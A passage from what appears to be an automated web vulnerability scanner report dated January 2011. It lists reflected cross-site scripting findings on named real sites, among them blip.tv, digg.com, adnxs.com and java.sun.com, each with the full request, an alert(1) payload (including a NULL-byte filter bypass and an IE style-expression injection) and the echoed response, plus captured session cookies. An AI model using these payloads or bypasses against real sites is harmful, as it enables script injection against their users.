HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 438
Date: Thu, 20 Jan 2011 00:26:52 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Sat, 19-Feb-2011 00:26:52 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.martini3f4db'-alert(1)-'1de1bb3448d/;sz=728x90;net=cm;ord=3271752524;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.3. http://a.collective-media.net/adj/cm.martini/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.martini/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ebe1'-alert(1)-'2b9cb0141a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.martini/;sz=728x90;click0=http%3a%2f%2fad.afy11.net%2fad%3fc%3dEPLFVb4gYEitVIXNBCKa0xQ7E-q0hdHagyKSV9rbMGn0fJ9zsbGZN4CyKa6mnyBGPxQkyumws5Xt6rwuZek5LVXWIZUsD%2bx8G9fs11dXeU4%3d!;ord=3271752524?&4ebe1'-alert(1)-'2b9cb0141a4=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.sailinganarchy.com/index_page1.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 442
Date: Thu, 20 Jan 2011 00:26:51 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Sat, 19-Feb-2011 00:26:51 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.martini/;sz=728x90;net=cm;ord=3271752524?&4ebe1'-alert(1)-'2b9cb0141a4=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.4. http://a.collective-media.net/adj/cm.martini/ [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.martini/

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a595d'-alert(1)-'08a39541440 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.martini/;sz=728x90;click0=http%3a%2f%2fad.afy11.net%2fad%3fc%3dEPLFVb4gYEitVIXNBCKa0xQ7E-q0hdHagyKSV9rbMGn0fJ9zsbGZN4CyKa6mnyBGPxQkyumws5Xt6rwuZek5LVXWIZUsD%2bx8G9fs11dXeU4%3d!;ord=3271752524?a595d'-alert(1)-'08a39541440 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.sailinganarchy.com/index_page1.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 439
Date: Thu, 20 Jan 2011 00:26:51 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Sat, 19-Feb-2011 00:26:51 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.martini/;sz=728x90;net=cm;ord=3271752524?a595d'-alert(1)-'08a39541440;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.5. http://americascup.mediaaccess.evolix.net/index.php [co parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://americascup.mediaaccess.evolix.net
Path:   /index.php

Issue detail

The value of the co request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 80dea'><script>alert(1)</script>985349a7ad9 was submitted in the co parameter. This input was echoed as 80dea\'><script>alert(1)</script>985349a7ad9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php?lang=en&fn=folio&FolioID=82&co=180dea'><script>alert(1)</script>985349a7ad9 HTTP/1.1
Host: americascup.mediaaccess.evolix.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 20 Jan 2011 00:37:31 GMT
Server: Apache
Set-Cookie: PHPSESSID=882939946f78dec4fe5d77aa92196538; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 188578

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Americas Cup Media -
...[SNIP]...
<input type='hidden' name='co' id='co' value='180dea\'><script>alert(1)</script>985349a7ad9'>
...[SNIP]...

3.6. http://americascup.mediaaccess.evolix.net/index.php [co parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://americascup.mediaaccess.evolix.net
Path:   /index.php

Issue detail

The value of the co request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69038"><script>alert(1)</script>d659b058562 was submitted in the co parameter. This input was echoed as 69038\"><script>alert(1)</script>d659b058562 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php?lang=en&fn=folio&FolioID=82&co=169038"><script>alert(1)</script>d659b058562 HTTP/1.1
Host: americascup.mediaaccess.evolix.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 20 Jan 2011 00:37:29 GMT
Server: Apache
Set-Cookie: PHPSESSID=f9889914ca2b88440659f29a0afa8321; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 188578

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Americas Cup Media -
...[SNIP]...
<a href="AC-45--wing-and-platform-finalization,82,169038\"><script>alert(1)</script>d659b058562,en,fp.html" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('imgpetite','','./taiga/americascup/4pictos_vign_petite_on.gif',1)">
...[SNIP]...

3.7. http://armchairmango.blip.tv/posts [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://armchairmango.blip.tv
Path:   /posts

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5887"><script>alert(1)</script>9370de61105 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /posts?e5887"><script>alert(1)</script>9370de61105=1 HTTP/1.1
Host: armchairmango.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Cookie
X-otter-skin: blipnew
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Thu, 03-Feb-2011 00:37:47 GMT
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Thu, 03-Feb-2011 00:37:47 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 52415
Date: Thu, 20 Jan 2011 00:37:47 GMT
X-Varnish: 1025262006
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>    
   
...[SNIP]...
<a href="/?sort=date;date=;user=armchairmango;s=posts;e5887"><script>alert(1)</script>9370de61105=1;page=2">
...[SNIP]...

3.8. http://armchairmango.blip.tv/posts [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://armchairmango.blip.tv
Path:   /posts

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7a409'%3balert(1)//6d1e7a506f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7a409';alert(1)//6d1e7a506f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /posts?7a409'%3balert(1)//6d1e7a506f9=1 HTTP/1.1
Host: armchairmango.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Cookie
X-otter-skin: blipnew
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Thu, 03-Feb-2011 00:37:56 GMT
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Thu, 03-Feb-2011 00:37:56 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 52289
Date: Thu, 20 Jan 2011 00:37:49 GMT
X-Varnish: 1025262141
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>    
   
...[SNIP]...
<script type="text/javascript">
   
       
                       window.rss_feed_url = 'http://armchairmango.blip.tv/rss?sort=date;page=1;date=;7a409';alert(1)//6d1e7a506f9=1;user=armchairmango;s=posts';
           window.generic_feed_uri = 'sort=date;page=1;date=;7a409\';alert(1)//6d1e7a506f9=1;user=armchairmango;s=posts';
           
       
   </script>
...[SNIP]...

3.9. http://backend.userland.com/creativeCommonsRssModule [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://backend.userland.com
Path:   /creativeCommonsRssModule

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 897c2<script>alert(1)</script>66f32101386 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /creativeCommonsRssModule897c2<script>alert(1)</script>66f32101386 HTTP/1.1
Host: backend.userland.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Length: 389
Content-Type: text/html
Date: Thu, 20 Jan 2011 00:37:07 GMT
Server: UserLand Frontier/9.5-WinNT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
   <head><title>404 Not Found</title>
   </head>
   <body bgcolor="white" text="black" link="blue" vlink="purple" alink="red">
       <
...[SNIP]...
</h2>
       The requested URL http://backend.userland.com/creativeCommonsRssModule897c2<script>alert(1)</script>66f32101386 was not found on this server.
       </body>
...[SNIP]...

3.10. http://blip.tv/posts/ [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /posts/

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 6a3a1<script>alert(1)</script>b9e99fd9f5f was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /posts/?bookmarked_by=hotepisodes&skin=json&callback=FeaturedContent.populateFeatured6a3a1<script>alert(1)</script>b9e99fd9f5f&version=2%20&pagelen=4&page=1 HTTP/1.1
Host: blip.tv
Proxy-Connection: keep-alive
Referer: http://blip.tv/file/4639878
X-Requested-With: XMLHttpRequest
Accept: text/javascript, application/javascript, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __utmb=3555683.1.10.1295482483; __qca=P0-535727044-1295482483262

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 20 Jan 2011 00:31:47 +0000
Cache-control: max-age=180, proxy-revalidate
Vary: Cookie
X-otter-skin: json
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Thu, 03-Feb-2011 00:28:47 GMT
Content-Type: text/javascript; charset=utf-8
Content-Length: 13571
Date: Thu, 20 Jan 2011 00:28:47 GMT
X-Varnish: 1324470526
Age: 0
Via: 1.1 varnish
Connection: keep-alive

FeaturedContent.populateFeatured6a3a1<script>alert(1)</script>b9e99fd9f5f([{
   "title":"Food Swap",
   "adminTitle":"Food Swap",
   "description":"Canned elk anyone? The summer\'s harvest is long over. Hours spent near a hot stove canning those tomatoes, peaches, or pickling be
...[SNIP]...

3.11. http://brxserv.btrll.com/crossdomain.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://brxserv.btrll.com
Path:   /crossdomain.xml

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e7aa1<script>alert(1)</script>2de7005331c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /crossdomain.xmle7aa1<script>alert(1)</script>2de7005331c HTTP/1.1
Host: brxserv.btrll.com
Proxy-Connection: keep-alive
Referer: http://a.blip.tv/scripts/flash/stratos.swf?file=http%3A//blip.tv/rss/flash/4658178%3Freferrer%3Dblip.tv%26source%3D1%26use_direct%3D1%26use_documents%3D1&enablejs=true&showplayerpath=http%3A//a.blip.tv/scripts/flash/stratos.swf&autostart=true&feedurl=http%3A//armchairmango.blip.tv/rss&playerUrl=http%3A//a.blip.tv/scripts/flash/stratos.swf&staggeredLoad=true&showinfo=false&enableHtml5Player=true
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DRN1=AGPX0VDzIfo; BR_MBBV=Ak0tGDgAo4f8AWJjWTw

Response

HTTP/1.0 404 Not Found
Date: Thu, 20 Jan 2011 00:28:16 GMT
Server: Apache/2.0.63 (Unix)
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: BR_MBBV=Ak0tGDgAo4f8AWJjWTw; expires=Thu, 19-Jan-2012 00:28:16 GMT; path=/; domain=.btrll.com
Content-Length: 206
Content-Type: text/html; charset=UTF-8

<html>
<head>
<title>Not Found</title>
</head>
<body>
<h1>404 - Not Found</h1>
Found unexpected '.' character in position 1 of path: /crossdomain.xmle7aa1<script>alert(1)</script>2de7005331c</body>
</
...[SNIP]...

3.12. http://digg.com/submit [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f9bac"><script>alert(1)</script>ae91c46f784 was submitted in the REST URL parameter 1. This input was echoed as f9bac"><script>alert(1)</script>ae91c46f784 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /submit%00f9bac"><script>alert(1)</script>ae91c46f784 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 20 Jan 2011 00:40:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1163899127717691648%3A164; expires=Fri, 21-Jan-2011 00:40:25 GMT; path=/; domain=digg.com
Set-Cookie: d=b5834023a2db5ed0524ef48ee5264f3757af35a33a6d22458193ead46af99172; expires=Tue, 19-Jan-2021 10:48:05 GMT; path=/; domain=.digg.com
X-Digg-Time: D=254963 10.2.130.26
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15581

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%00f9bac"><script>alert(1)</script>ae91c46f784.rss">
...[SNIP]...

3.13. http://ib.adnxs.com/ptj [redir parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b90fa'%3balert(1)//c600b73d47 was submitted in the redir parameter. This input was echoed as b90fa';alert(1)//c600b73d47 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ptj?member=311&inv_code=cm.martini&size=728x90&referrer=http%3A%2F%2Fwww.sailinganarchy.com%2Findex_page1.php&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.martini%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-82053649_1295482372%2C11d765b6a10b1b3%2Csports%2Ccm.cm_aa_gn1-cm.weath_l%3B%3Bcmw%3Dowl%3Bsz%3D728x90%3Bnet%3Dcm%3Bord1%3D707118%3Bcontx%3Dsports%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.weath_l%3Bord%3D3271752524%3Fb90fa'%3balert(1)//c600b73d47 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.sailinganarchy.com/index_page1.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=EAAYAA..; sess=1; uuid2=4760492999213801733; anj=Kfu=8fG10Qcvjr/?0P(*AuB-u**g1:XICjmUMbNTn>qsXgZ2Ox#Kzwi3jhndu4.q@P`fym?BM6A(6j?L^F^pT+$t)o#'1yqNmTr+csDU[n.KmyD0IP?EJtun(LG%y$qg]mw!5$=%sod-+0?6As/^Y`/=Uxi

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 21-Jan-2011 00:30:49 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:30:49 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Wed, 20-Apr-2011 00:30:49 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb448794=5_[r^kI/7ZrO@Pn0nf8MJg5TL?enc=usDlsWbk4j8Ox07TwgDhPwAAAAAAAAhADsdO08IA4T-6wOWxZuTiPxP-XtM-6VNaBWHfHSmrEEI5gjdNAAAAAGI7AwA3AQAAZAAAAAIAAAA4UAIAPV0AAAEAAABVU0QAVVNEANgCWgCqAQAALAkBAgUCAAUAAAAAKiFTbQAAAAA.&tt_code=cm.martini&udj=uf%28%27a%27%2C+27%2C+1295483449%29%3Buf%28%27r%27%2C+151608%2C+1295483449%29%3Bppv%2882%2C+%276508802342523960851%27%2C+1295483449%2C+1305851449%2C+2132%2C+23869%29%3Bppv%2884%2C+%276508802342523960851%27%2C+1295483449%2C+1305851449%2C+2132%2C+23869%29%3Bppv%2811%2C+%276508802342523960851%27%2C+1295483449%2C+1305851449%2C+2132%2C+23869%29%3Bppv%2882%2C+%276508802342523960851%27%2C+1295483449%2C+1305851449%2C+2132%2C+23869%29%3Bppv%2884%2C+%276508802342523960851%27%2C+1295483449%2C+1305851449%2C+2132%2C+23869%29%3Bppv%2887%2C+%276508802342523960851%27%2C+1295483449%2C+1295569849%2C+2132%2C+23869%29%3Bppv%28619%2C+%276508802342523960851%27%2C+1295483449%2C+1295569849%2C+2132%2C+23869%29%3Bppv%28620%2C+%276508802342523960851%27%2C+1295483449%2C+1295569849%2C+2132%2C+23869%29%3Bppv%28621%2C+%276508802342523960851%27%2C+1295483449%2C+1295569849%2C+2132%2C+23869%29%3B&cnd=!LR4gugjUEBC4oAkYwI8BIL26ASgAMVSzvcxm5OI_QhMIABAAGAAgASj-__________8BQg0IUhC-40sYpQggAygGQg0IVBDVlhsYgQQgAygGSANQAFiqA2AAaGQ.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Fri, 21-Jan-2011 00:30:49 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:30:49 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG10Qcvjr/?0P(*AuB-u**g1:XICjmUMbNTPg(12lh-=?(PCR0ep_TvkXX49-qCQB:hlS?9mnBpbb)jKuoIgTwzHPZ2[uGVGi2$WVP]vE7ilpu2(MPy%SF(w77BERA(EO4I(3<csJ3xssMeZG!9VNR'OLN2; path=/; expires=Wed, 20-Apr-2011 00:30:49 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 20 Jan 2011 00:30:49 GMT
Content-Length: 429

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.martini/;net=cm;u=,cm-82053649_1295482372,11d765b6a10b1b3,sports,cm.cm_aa_gn1-cm.weath_l;;cmw=owl;sz=728x90;net=cm;ord1=707118;contx=sports;an=40;dc=w;btg=cm.cm_aa_gn1;btg=cm.weath_l;ord=3271752524?b90fa';alert(1)//c600b73d47">
...[SNIP]...

3.14. http://java.sun.com/products/plugin/autodl/jinstall-1_4_2-windows-i586.cab [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://java.sun.com
Path:   /products/plugin/autodl/jinstall-1_4_2-windows-i586.cab

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a4b7"style%3d"x%3aexpression(alert(1))"7e6ef821d0e was submitted in the REST URL parameter 1. This input was echoed as 5a4b7"style="x:expression(alert(1))"7e6ef821d0e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products5a4b7"style%3d"x%3aexpression(alert(1))"7e6ef821d0e/plugin/autodl/jinstall-1_4_2-windows-i586.cab HTTP/1.1
Host: java.sun.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not found
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 20 Jan 2011 00:41:25 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Sun Microsystems</title>
<!-- BEGIN METADATA -->
<meta http-equiv="content-type" content="text/html; charse
...[SNIP]...
<a href="/contact/feedback.jsp?
referer=http://java.sun.com/notfound.jsp
&requrl=http://java.sun.com/products5a4b7"style="x:expression(alert(1))"7e6ef821d0e/plugin/autodl/jinstall-1_4_2-windows-i586.cab
&refurl=http://java.sun.com/UserTypedUrl
&category=se">
...[SNIP]...

3.15. http://java.sun.com/products/plugin/autodl/jinstall-1_4_2-windows-i586.cab [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://java.sun.com
Path:   /products/plugin/autodl/jinstall-1_4_2-windows-i586.cab

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ec44"style%3d"x%3aexpression(alert(1))"e3f53b57d76 was submitted in the REST URL parameter 2. This input was echoed as 5ec44"style="x:expression(alert(1))"e3f53b57d76 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/plugin5ec44"style%3d"x%3aexpression(alert(1))"e3f53b57d76/autodl/jinstall-1_4_2-windows-i586.cab HTTP/1.1
Host: java.sun.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not found
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 20 Jan 2011 00:40:41 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Sun Microsystems</title>
<!-- BEGIN METADATA -->
<meta http-equiv="content-type" content="text/html; charse
...[SNIP]...
<a href="/contact/feedback.jsp?
referer=http://java.sun.com/notfound.jsp
&requrl=http://java.sun.com/products/plugin5ec44"style="x:expression(alert(1))"e3f53b57d76/autodl/jinstall-1_4_2-windows-i586.cab
&refurl=http://java.sun.com/UserTypedUrl
&category=se">
...[SNIP]...

3.16. http://java.sun.com/products/plugin/autodl/jinstall-1_4_2-windows-i586.cab [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://java.sun.com
Path:   /products/plugin/autodl/jinstall-1_4_2-windows-i586.cab

Issue detail

